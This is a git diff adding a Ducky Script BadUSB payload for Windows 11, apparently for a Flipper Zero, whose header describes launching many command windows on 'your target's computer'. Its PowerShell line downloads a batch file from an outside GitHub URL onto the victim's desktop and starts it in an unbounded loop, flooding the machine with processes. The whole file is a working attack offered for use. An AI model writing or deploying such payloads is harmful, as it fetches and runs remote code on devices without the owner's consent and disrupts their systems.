diff --git a/windows11/create_infinite_cmd.txt b/windows11/create_infinite_cmd.txt new file mode 100644 index 0000000..401a378 --- /dev/null +++ b/windows11/create_infinite_cmd.txt @@ -0,0 +1,12 @@ +REM Author: SeenKid (seenkid#1337 on Discord) +REM Description: Launch a lot of cmds on your target's computer +REM Version: 1.0 +DELAY 500 +GUI r +DELAY 500 +STRING powershell +ENTER +DELAY 500 +STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/startcmd.bat -OutFile $DesktopPath/cmd.bat; while($ac -lt 9000) { Start-Process -FilePath $DesktopPath/cmd.bat} +DELAY 100 +ENTER